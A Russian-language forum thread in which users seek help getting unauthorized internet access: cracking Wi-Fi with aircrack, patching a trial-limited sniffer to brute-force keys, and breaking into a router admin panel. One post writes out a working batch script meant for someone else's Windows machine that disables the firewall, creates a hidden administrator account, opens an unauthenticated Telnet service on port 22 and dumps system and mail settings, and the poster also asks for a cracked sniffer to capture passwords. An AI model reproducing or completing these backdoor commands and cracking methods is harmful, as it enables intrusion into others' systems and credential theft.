Есть ноут и на нем карта Atheros AR5007EG Wireless Networ пробую юзать aircrack но он пишет что не поддержует мой адаптер.... пробовал ставить двое дров но без результат ... я работаю далеко сейчас и мне жизненно необходимо сделать себе халявные нет! пожалуйста напишите в приват что лучше сделать или какие дрова лучше качнуть.... или тупо покупать pce карту....
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers тут написано, что атерос работает качай какой-нибудь старый CommView, где в триале стоит лимит на пакеты, правь реестр на 500000 пакетов (должно хватить) лови и бруть.
работаю в море ) тут на некоторых машинах есть доступ на мыло(не лимитированный, пробовал ставить их мак и ип но не спасает) и походу в инет... хочу скинуть на флеху батник и проксю которая бы установилась и настроилась за 3 сек... пока вот что накидал... подскажи проксю под XP самуую простую которую можно было бы установить и настроить из Bat файла... если можно то ссылки... лазить в инете нет возможности....РЕБЯТА ПОМОГИТЕ!! (ДОПОЛНИТЕ КОД) также на компе админа запущен дед .... пробовал tcpdump ом под виндой что то поймать посмотреть, ну что то он не фига вообще не ловит... есть какой актуальный снифер с кряком??(в инете не нашел, киньте линк) ... я могу ноут оставить хоть на 2 дня пусть ловит пассы netsh firewall set opmode disable net user root root /add net localgroup Administrators root /add reg add "hklm\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t reg_dword /d 00000000 /f sc config tlntsvr start= auto tlntadmn config port=22 sec=-NTLM net start Telnet ipconfig /all>>ip.txt netsh diag show ieproxy>>ie.txt netsh diag show mail>>mail.txt systeminfo>>sinfo.txt пожалуйста не удаляйте топ!!!
Здрасте.. есть сетка в которой доступ разрешен на 5 сайтов .... бесплатно типо... вопрос в следующем как можно зайходить на остальные сайты... ? как скорее всего там реализована система проверки?
ну тут тема такая на роутере править нада доступ то с него дают , я так делал ... пробую в админку залесть юзать сниферы итп